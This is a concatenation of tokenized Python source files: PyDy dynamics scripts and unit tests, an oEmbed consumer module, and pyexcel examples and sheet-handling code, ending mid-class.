solve ( kde , [ q1d , q2d , q3d ] ) <EOL> for k , v in kde_map . 
items ( ) : <EOL> kde_map [ k . diff ( t ) ] = v . diff ( t ) <EOL> partials = partial_velocities ( points , [ u1 , u2 , u3 ] , A , kde_map ) <EOL> Fr , _ = generalized_active_forces ( partials , forces ) <EOL> Fr_star , _ = generalized_inertia_forces ( partials , point_masses , kde_map ) <EOL> vc = [ dot ( pDs . vel ( B ) , E . y ) ] <EOL> vc_map = solve ( subs ( vc , kde_map ) , [ u3 ] ) <EOL> partials_tilde = partial_velocities ( points , [ u1 , u2 ] , A , kde_map , vc_map ) <EOL> Fr_tilde , _ = generalized_active_forces ( partials_tilde , forces ) <EOL> Fr_tilde_star , _ = generalized_inertia_forces ( partials_tilde , point_masses , <EOL> kde_map , vc_map ) <EOL> print ( "<STR_LIT>" . format ( msprint ( u_expr ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_star , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_tilde , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for i , f in enumerate ( Fr_tilde_star , <NUM_LIT:1> ) : <EOL> print ( "<STR_LIT>" . format ( i , msprint ( simplify ( f ) ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> A31 , A32 = map ( lambda x : diff ( vc_map [ u3 ] , x ) , [ u1 , u2 ] ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( Fr [ <NUM_LIT:0> ] + A31 * Fr [ <NUM_LIT:2> ] ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( Fr [ <NUM_LIT:1> ] + A32 * Fr [ <NUM_LIT:2> ] ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( <EOL> ( Fr_star [ <NUM_LIT:0> ] + A31 * Fr_star [ <NUM_LIT:2> ] ) . subs ( vc_map ) ) ) ) ) <EOL> print ( "<STR_LIT>" . format ( msprint ( simplify ( <EOL> ( Fr_star [ <NUM_LIT:1> ] + A32 * Fr_star [ <NUM_LIT:2> ] ) . subs ( vc_map ) ) ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy . integrate import odeint <EOL> from joblib import Parallel , delayed <EOL> from pydy . models import n_link_pendulum_on_cart <EOL> print ( '<STR_LIT>' ) <EOL> sys = n_link_pendulum_on_cart ( <NUM_LIT:10> , False , False ) <EOL> print ( '<STR_LIT>' ) <EOL> x = np . random . random ( len ( sys . states ) ) <EOL> t = np . linspace ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) <EOL> p_set = np . random . random ( ( <NUM_LIT:16> , len ( sys . constants_symbols ) ) ) <EOL> print ( '<STR_LIT>' ) <EOL> rhs = sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> def rhs_wrapper ( p ) : <EOL> return rhs ( x , t [ <NUM_LIT:0> ] , p ) <EOL> def odeint_wrapper ( p ) : <EOL> return odeint ( rhs , x , t , args = ( p , ) ) <EOL> print ( '<STR_LIT>' ) <EOL> res1 = Parallel ( n_jobs = - <NUM_LIT:1> ) ( delayed ( rhs_wrapper ) ( p ) for p in p_set ) <EOL> print ( '<STR_LIT>' ) <EOL> res2 = Parallel ( n_jobs = - <NUM_LIT:1> ) ( delayed ( odeint_wrapper ) ( p ) for p in p_set ) </s>
<s> import warnings <EOL> import numpy as np <EOL> from numpy import testing <EOL> import sympy as sm <EOL> import sympy . physics . mechanics as me <EOL> from scipy . integrate import odeint <EOL> theano = sm . external . import_module ( '<STR_LIT>' ) <EOL> from . . system import System <EOL> from . . models import multi_mass_spring_damper , n_link_pendulum_on_cart <EOL> from . . utils import sympy_equal_to_or_newer_than , PyDyImportWarning <EOL> SYMPY_VERSION = sm . __version__ <EOL> warnings . simplefilter ( '<STR_LIT>' , PyDyImportWarning ) <EOL> class TestSystem ( ) : <EOL> def setup ( self ) : <EOL> self . sys = multi_mass_spring_damper ( <NUM_LIT:1> , apply_gravity = True , <EOL> apply_external_forces = True ) <EOL> self . specified_symbol = next ( iter ( self . sys . specifieds_symbols ) ) <EOL> self . constant_map = dict ( zip ( sm . symbols ( '<STR_LIT>' ) , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> ] ) ) <EOL> self . sys . specifieds = { self . specified_symbol : np . ones ( <NUM_LIT:1> ) } <EOL> self . sys . constants = self . constant_map <EOL> self . kane = self . sys . eom_method <EOL> self . kane_nlink = n_link_pendulum_on_cart ( <NUM_LIT:3> , cart_force = True , <EOL> joint_torques = True ) . eom_method <EOL> def test_init ( self ) : <EOL> sys = System ( self . kane ) <EOL> assert ( sys . constants_symbols == <EOL> set ( sm . symbols ( '<STR_LIT>' ) ) ) <EOL> assert sys . specifieds_symbols == { self . specified_symbol } <EOL> assert sys . states == me . dynamicsymbols ( '<STR_LIT>' ) <EOL> assert sys . evaluate_ode_function is None <EOL> assert sys . eom_method is self . kane <EOL> assert sys . ode_solver is odeint <EOL> assert sys . specifieds == dict ( ) <EOL> assert sys . initial_conditions == dict ( ) <EOL> assert sys . constants == dict ( ) <EOL> assert sys . times == list ( ) <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> , me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . 
kane , <EOL> ode_solver = odeint , <EOL> specifieds = { self . specified_symbol : np . ones ( <NUM_LIT:1> ) } , <EOL> initial_conditions = ic , <EOL> constants = self . constant_map ) <EOL> assert sys . eom_method is self . kane <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , <EOL> [ np . ones ( <NUM_LIT:1> ) ] ) <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> assert sys . constants . keys ( ) == self . constant_map . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( self . constant_map . values ( ) ) ) <EOL> sys = System ( self . kane , <EOL> ode_solver = odeint , <EOL> specifieds = { '<STR_LIT>' : [ self . specified_symbol ] , <EOL> '<STR_LIT>' : np . ones ( <NUM_LIT:1> ) } , <EOL> initial_conditions = ic , <EOL> constants = self . constant_map ) <EOL> def test_coordinates ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . coordinates == self . kane . q [ : ] <EOL> else : <EOL> assert self . sys . coordinates == self . kane . _q <EOL> def test_speeds ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . speeds == self . kane . u [ : ] <EOL> else : <EOL> assert self . sys . speeds == self . kane . _u <EOL> def test_states ( self ) : <EOL> if sympy_equal_to_or_newer_than ( '<STR_LIT>' ) : <EOL> assert self . sys . states == self . kane . q [ : ] + self . kane . u [ : ] <EOL> else : <EOL> assert self . sys . states == self . kane . _q + self . kane . _u <EOL> def test_constants ( self ) : <EOL> constants = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> , sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane , constants = constants ) <EOL> assert sys . constants . 
keys ( ) == constants . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( constants . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> assert sys . constants == dict ( ) <EOL> sys . constants = constants <EOL> assert sys . constants . keys ( ) == constants . keys ( ) <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , <EOL> list ( constants . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> sys . constants [ sm . symbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . constants . keys ( ) ) == [ sm . symbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . constants . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . constants [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> sys . times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . constants = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . constants = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> def test_specifieds ( self ) : <EOL> sys = System ( self . kane ) <EOL> assert sys . specifieds == dict ( ) <EOL> sys . specifieds = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . specifieds . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . specifieds . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> sys . times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] <EOL> with testing . 
assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane ) <EOL> sys . specifieds [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> * np . ones ( <NUM_LIT:2> ) <EOL> sys = System ( self . kane ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:10> ) <EOL> sys . specifieds = { <EOL> spec_syms [ <NUM_LIT:0> ] : lambda x , t : np . ones ( t ) , <EOL> ( spec_syms [ <NUM_LIT:3> ] , spec_syms [ <NUM_LIT:1> ] ) : lambda x , t : np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> ] ) , <EOL> spec_syms [ <NUM_LIT:2> ] : <NUM_LIT> * np . ones ( <NUM_LIT:1> ) } <EOL> sys . specifieds [ spec_syms [ <NUM_LIT:1> ] ] = <NUM_LIT> <EOL> sys . times = times <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane_nlink ) <EOL> sys . specifieds [ spec_syms [ <NUM_LIT:0> ] ] = <NUM_LIT> <EOL> sys . specifieds [ ( spec_syms [ <NUM_LIT:0> ] , spec_syms [ <NUM_LIT:3> ] ) ] = <NUM_LIT> <EOL> sys . times = times <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> sys . specifieds . pop ( spec_syms [ <NUM_LIT:0> ] ) <EOL> sys . integrate ( ) <EOL> sys = System ( self . kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> sys . specifieds = dict ( zip ( spec_syms , [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> sys . times = times <EOL> x_01 = sys . integrate ( ) <EOL> sys . specifieds = { '<STR_LIT>' : spec_syms , <EOL> '<STR_LIT>' : [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] } <EOL> x_02 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_02 ) <EOL> with testing . 
assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ sm . symbols ( '<STR_LIT>' ) ] , '<STR_LIT>' : [ <NUM_LIT:1.0> ] } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ sm . symbols ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . specifieds = { '<STR_LIT>' : [ me . dynamicsymbols ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <NUM_LIT:1.0> ] } <EOL> sys . specifieds = { <EOL> '<STR_LIT>' : [ spec_syms [ <NUM_LIT:1> ] , spec_syms [ <NUM_LIT:0> ] , spec_syms [ <NUM_LIT:2> ] , <EOL> spec_syms [ <NUM_LIT:3> ] ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ] } <EOL> sys . generate_ode_function ( ) <EOL> x_04 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_04 ) <EOL> sys = multi_mass_spring_damper ( <NUM_LIT:1> , apply_gravity = True ) <EOL> sys . initial_conditions = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT:0.1> , <EOL> me . dynamicsymbols ( '<STR_LIT>' ) : - <NUM_LIT:1.0> } <EOL> sys . times = times <EOL> sys . integrate ( ) <EOL> def test_times ( self ) : <EOL> times1 = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] <EOL> times2 = [ <NUM_LIT:0> , - <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:3> , - <NUM_LIT:5> ] <EOL> times3 = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> times4 = <NUM_LIT:4> <EOL> sys = System ( self . kane , times = times1 ) <EOL> testing . assert_allclose ( sys . times , times1 ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . times = times2 <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . times = times3 <EOL> with testing . assert_raises ( TypeError ) : <EOL> sys . times = times4 <EOL> def test_ode_solver ( self ) : <EOL> assert self . sys . ode_solver == odeint <EOL> self . sys . 
ode_solver = max <EOL> assert self . sys . ode_solver is max <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . ode_solver = <NUM_LIT:5> <EOL> def test_initial_conditions ( self ) : <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> sys = System ( self . kane , initial_conditions = ic ) <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> sys = System ( self . kane ) <EOL> sys . initial_conditions = ic <EOL> assert sys . initial_conditions . keys ( ) == ic . keys ( ) <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , <EOL> list ( ic . values ( ) ) ) <EOL> sys = System ( self . kane , times = [ <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ) <EOL> sys . initial_conditions [ me . dynamicsymbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> assert list ( sys . initial_conditions . keys ( ) ) == [ me . dynamicsymbols ( '<STR_LIT>' ) ] <EOL> testing . assert_allclose ( list ( sys . initial_conditions . values ( ) ) , [ <NUM_LIT> ] ) <EOL> sys . initial_conditions [ sm . symbols ( '<STR_LIT>' ) ] = <NUM_LIT> <EOL> with testing . assert_raises ( ValueError ) : <EOL> sys . integrate ( ) <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . initial_conditions = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> with testing . assert_raises ( ValueError ) : <EOL> self . sys . initial_conditions = { sm . symbols ( '<STR_LIT>' ) : <NUM_LIT> } <EOL> def test_generate_ode_function ( self ) : <EOL> rhs = self . sys . generate_ode_function ( ) <EOL> assert rhs is self . sys . evaluate_ode_function <EOL> args = ( self . sys . specifieds , self . sys . constants ) <EOL> actual = rhs ( np . ones ( <NUM_LIT:2> ) , <NUM_LIT:0.0> , * args ) <EOL> testing . assert_allclose ( actual , np . array ( [ <NUM_LIT:1> , <NUM_LIT> ] ) ) <EOL> sys = System ( self . 
kane_nlink ) <EOL> spec_syms = list ( sys . specifieds_symbols ) <EOL> rhs = sys . generate_ode_function ( ) <EOL> x = np . array ( np . random . random ( len ( sys . states ) ) ) <EOL> args = ( self . sys . specifieds , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> args = ( dict ( zip ( spec_syms , [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> xd_01 = rhs ( x , <NUM_LIT:0.0> , * args ) <EOL> args = ( { spec_syms [ <NUM_LIT:0> ] : lambda x , t : np . ones ( <NUM_LIT:1> ) , <EOL> ( spec_syms [ <NUM_LIT:3> ] , spec_syms [ <NUM_LIT:1> ] ) : lambda x , t : np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> ] ) , <EOL> spec_syms [ <NUM_LIT:2> ] : <NUM_LIT> * np . ones ( <NUM_LIT:1> ) } , <EOL> { k : <NUM_LIT:1.0> for k in sys . constants_symbols } ) <EOL> xd_02 = rhs ( x , <NUM_LIT:0.0> , * args ) <EOL> testing . assert_allclose ( xd_01 , xd_02 ) <EOL> def test_integrate ( self ) : <EOL> times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> sys = System ( self . kane , times = times ) <EOL> x_01 = sys . integrate ( ) <EOL> sys = System ( self . kane , times = times ) <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> x_02 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_01 , x_02 ) <EOL> constants_dict = dict ( zip ( sm . symbols ( '<STR_LIT>' ) , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) ) <EOL> specified_dict = { me . dynamicsymbols ( '<STR_LIT>' ) : <NUM_LIT:0.0> } <EOL> x_03 = sys . ode_solver ( sys . evaluate_ode_function , [ <NUM_LIT:0> , <NUM_LIT:0> ] , sys . times , <EOL> args = ( specified_dict , constants_dict ) ) <EOL> testing . assert_allclose ( x_02 , x_03 ) <EOL> sys = System ( self . kane , times = times ) <EOL> x0 = [ <NUM_LIT> , <NUM_LIT> ] <EOL> ic = { me . dynamicsymbols ( '<STR_LIT>' ) : x0 [ <NUM_LIT:0> ] , me . dynamicsymbols ( '<STR_LIT>' ) : x0 [ <NUM_LIT:1> ] } <EOL> sys . 
initial_conditions = ic <EOL> x_04 = sys . integrate ( ) <EOL> x_05 = sys . ode_solver ( <EOL> sys . evaluate_ode_function , x0 , sys . times , <EOL> args = ( sys . _specifieds_padded_with_defaults ( ) , <EOL> sys . _constants_padded_with_defaults ( ) ) ) <EOL> testing . assert_allclose ( x_04 , x_05 ) <EOL> if theano : <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> sys . times = times <EOL> x_06 = sys . integrate ( ) <EOL> testing . assert_allclose ( x_04 , x_06 ) <EOL> else : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , PyDyImportWarning ) <EOL> sys = System ( self . kane , times = times ) <EOL> with testing . assert_raises ( NotImplementedError ) : <EOL> sys . generate_ode_function ( generator = '<STR_LIT>' ) <EOL> def test_specifying_coordinate_issue_339 ( ) : <EOL> """<STR_LIT>""" <EOL> beta = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> q1 , q2 , q3 , q4 = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> u1 , u2 , u3 , u4 = me . dynamicsymbols ( '<STR_LIT>' ) <EOL> N = me . ReferenceFrame ( '<STR_LIT:N>' ) <EOL> A = N . orientnew ( '<STR_LIT:A>' , '<STR_LIT>' , ( q1 , N . x ) ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , ( beta , A . y ) ) <EOL> No = me . Point ( '<STR_LIT>' ) <EOL> Ao = No . locatenew ( '<STR_LIT>' , q2 * N . x + q3 * N . y + q4 * N . z ) <EOL> Bo = Ao . locatenew ( '<STR_LIT>' , <NUM_LIT:10> * A . x + <NUM_LIT:10> * A . y + <NUM_LIT:10> * A . z ) <EOL> A . set_ang_vel ( N , u1 * N . x ) <EOL> B . ang_vel_in ( N ) <EOL> No . set_vel ( N , <NUM_LIT:0> ) <EOL> Ao . set_vel ( N , u2 * N . x + u3 * N . y + u4 * N . z ) <EOL> Bo . v2pt_theory ( Ao , N , B ) <EOL> body_A = me . RigidBody ( '<STR_LIT:A>' , Ao , A , <NUM_LIT:1.0> , ( me . inertia ( A , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , Ao ) ) <EOL> body_B = me . RigidBody ( '<STR_LIT:B>' , Bo , B , <NUM_LIT:1.0> , ( me . 
inertia ( A , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) , Bo ) ) <EOL> bodies = [ body_A , body_B ] <EOL> loads = [ ( No , <NUM_LIT:0> * N . x ) ] <EOL> kdes = [ u1 - q1 . diff ( ) , <EOL> u2 - q2 . diff ( ) , <EOL> u3 - q3 . diff ( ) , <EOL> u4 - q4 . diff ( ) ] <EOL> kane = me . KanesMethod ( N , q_ind = [ q1 , q2 , q3 , q4 ] , <EOL> u_ind = [ u1 , u2 , u3 , u4 ] , kd_eqs = kdes ) <EOL> fr , frstar = kane . kanes_equations ( loads , bodies ) <EOL> sys = System ( kane ) <EOL> sys . specifieds = { ( beta , beta . diff ( ) , beta . diff ( ) . diff ( ) ) : <EOL> lambda x , t : np . array ( [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) } <EOL> sys . times = np . linspace ( <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:20> ) <EOL> sys . integrate ( ) </s>
<s> import logging <EOL> import requests <EOL> from pyembed . core import parse <EOL> from pyembed . core . error import PyEmbedError <EOL> try : <EOL> from urlparse import parse_qsl , urljoin , urlsplit , urlunsplit <EOL> from urllib import urlencode <EOL> except ImportError : <EOL> from urllib . parse import parse_qsl , urljoin , urlsplit , urlunsplit , urlencode <EOL> class PyEmbedConsumerError ( PyEmbedError ) : <EOL> """<STR_LIT>""" <EOL> def get_first_oembed_response ( oembed_urls , max_width = None , max_height = None ) : <EOL> """<STR_LIT>""" <EOL> for oembed_url in oembed_urls : <EOL> try : <EOL> return get_oembed_response ( oembed_url , max_width = max_width , max_height = max_height ) <EOL> except PyEmbedError : <EOL> logging . warn ( '<STR_LIT>' % oembed_url , exc_info = True ) <EOL> raise PyEmbedConsumerError ( '<STR_LIT>' % oembed_urls ) <EOL> def get_oembed_response ( oembed_url , max_width = None , max_height = None ) : <EOL> """<STR_LIT>""" <EOL> response = requests . get ( __format_url ( oembed_url , max_width , max_height ) ) <EOL> if not response . ok : <EOL> raise PyEmbedConsumerError ( '<STR_LIT>' % ( <EOL> oembed_url , response . status_code ) ) <EOL> content_type = response . headers [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] <EOL> return parse . parse_oembed ( response . text , content_type ) <EOL> def __format_url ( oembed_url , max_width = None , max_height = None ) : <EOL> scheme , netloc , path , query_string , fragment = urlsplit ( oembed_url ) <EOL> query_params = parse_qsl ( query_string ) <EOL> if max_width is not None : <EOL> query_params . append ( ( '<STR_LIT>' , max_width ) ) <EOL> if max_height : <EOL> query_params . append ( ( '<STR_LIT>' , max_height ) ) <EOL> new_query_string = urlencode ( query_params , doseq = True ) <EOL> return urlunsplit ( ( scheme , netloc , path , new_query_string , fragment ) ) </s>
<s> import sys <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> and sys . version_info [ <NUM_LIT:1> ] < <NUM_LIT:7> : <EOL> from ordereddict import OrderedDict <EOL> else : <EOL> from collections import OrderedDict <EOL> if PY2 : <EOL> from StringIO import StringIO as BytesIO <EOL> else : <EOL> from io import BytesIO </s>
"""<STR_LIT>"""
import pyexcel as pe
# Importing the xls plugin registers the .xls reader/writer as a side
# effect; the module itself is not referenced below.
import pyexcel.ext.xls

# Sample workbook content: sheet name -> 2D list of cell values.
# NOTE(review): the three keys were distinct strings in the original
# source; they look identical here only because string literals have
# been anonymised.
data = {
    "<STR_LIT>": [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
    "<STR_LIT>": [['<STR_LIT:X>', '<STR_LIT:Y>', '<STR_LIT>'], [1, 2, 3], [4, 5, 6]],
    "<STR_LIT>": [['<STR_LIT:O>', '<STR_LIT:P>', '<STR_LIT>'], [3, 2, 1], [4, 3, 2]]
}

# Build a multi-sheet workbook from the dict and write it to disk.
book = pe.Book(data)
book.save_as("<STR_LIT>")
"""<STR_LIT>"""
from texttable import Texttable
from .matrix import Row, Column, Matrix
from .formattablesheet import FormattableSheet
from .filterablesheet import FilterableSheet
from ..formatters import (
    ColumnFormatter,
    RowFormatter,
    NamedColumnFormatter,
    NamedRowFormatter)
from .._compact import is_string, OrderedDict, PY2, is_array_type
from ..filters import ColumnIndexFilter, RowIndexFilter
from ..iterators import (
    ColumnIndexIterator,
    RowIndexIterator,
    NamedRowIterator,
    NamedColumnIterator
)
from ..constants import MESSAGE_NOT_IMPLEMENTED_02, MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED, DEFAULT_NAME


def names_to_indices(names, series):
    # Translate a single name (str) or a list of names into positional
    # indices against `series`; anything else is passed through untouched.
    if isinstance(names, str):
        indices = series.index(names)
    elif (isinstance(names, list) and
          isinstance(names[0], str)):
        indices = [series.index(astr) for astr in names]
    else:
        return names
    return indices


def make_names_unique(alist):
    # Stringify every item and suffix repeats with an occurrence counter
    # so the resulting name list has no duplicates.
    duplicates = {}
    new_names = []
    for item in alist:
        if item in duplicates:
            duplicates[item] = duplicates[item] + 1
            new_names.append("<STR_LIT>" % (item, duplicates[item]))
        else:
            duplicates[item] = 0
            new_names.append(str(item))
    return new_names


class NamedRow(Row):
    """<STR_LIT>

    Row accessor that additionally resolves row *names* (via the owning
    sheet's ``rownames``) to indices before delegating to ``Row``.
    """
    def select(self, names):
        """<STR_LIT>"""
        if is_array_type(names, str):
            indices = names_to_indices(names, self.ref.rownames)
            Row.select(self, indices)
        else:
            Row.select(self, names)

    def __delitem__(self, column_name):
        """<STR_LIT>"""
        if is_string(type(column_name)):
            self.ref.delete_named_row_at(column_name)
        elif isinstance(column_name, tuple) and is_array_type(list(column_name), str):
            # A tuple of names, e.g. del sheet.row['a', 'b'].
            indices = names_to_indices(list(column_name), self.ref.rownames)
            Row.__delitem__(self, indices)
        else:
            Row.__delitem__(self, column_name)

    def __setitem__(self, str_or_aslice, c):
        if is_string(type(str_or_aslice)):
            self.ref.set_named_row_at(str_or_aslice, c)
        else:
            Row.__setitem__(self, str_or_aslice, c)

    def __getitem__(self, str_or_aslice):
        if is_string(type(str_or_aslice)):
            return self.ref.named_row_at(str_or_aslice)
        else:
            return Row.__getitem__(self, str_or_aslice)

    def __iadd__(self, other):
        """<STR_LIT>"""
        # An OrderedDict extends with row names; other iterables extend
        # positionally via the base class.
        if isinstance(other, OrderedDict):
            self.ref.extend_rows(other)
        else:
            Row.__iadd__(self, other)
        return self

    def __add__(self, other):
        """<STR_LIT>"""
        self.__iadd__(other)
        return self.ref

    def format(self,
               row_index=None, formatter=None,
               format_specs=None, on_demand=False):
        """<STR_LIT>"""
        def handle_one_formatter(rows, theformatter, on_demand):
            # Resolve row names to indices when row names exist, then
            # either queue (on_demand) or immediately apply the formatter.
            new_indices = rows
            if len(self.ref.rownames) > 0:
                new_indices = names_to_indices(rows, self.ref.rownames)
            aformatter = RowFormatter(new_indices, theformatter)
            if on_demand:
                self.ref.add_formatter(aformatter)
            else:
                self.ref.apply_formatter(aformatter)
        if row_index is not None:
            handle_one_formatter(row_index, formatter, on_demand)
        elif format_specs:
            for spec in format_specs:
                # NOTE(review): both branches are identical; the
                # len(spec) == 3 case presumably intended to use spec[2]
                # (e.g. extra format args) — confirm against callers.
                if len(spec) == 3:
                    handle_one_formatter(spec[0], spec[1],
                                         on_demand)
                else:
                    handle_one_formatter(spec[0], spec[1],
                                         on_demand)


class NamedColumn(Column):
    """<STR_LIT>

    Column accessor that resolves column *names* (via the owning sheet's
    ``colnames``) to indices before delegating to ``Column``.
    """
    def select(self, names):
        """<STR_LIT>"""
        if is_array_type(names, str):
            indices = names_to_indices(names, self.ref.colnames)
            Column.select(self, indices)
        else:
            Column.select(self, names)

    def __delitem__(self, str_or_aslice):
        """<STR_LIT>"""
        if is_string(type(str_or_aslice)):
            self.ref.delete_named_column_at(str_or_aslice)
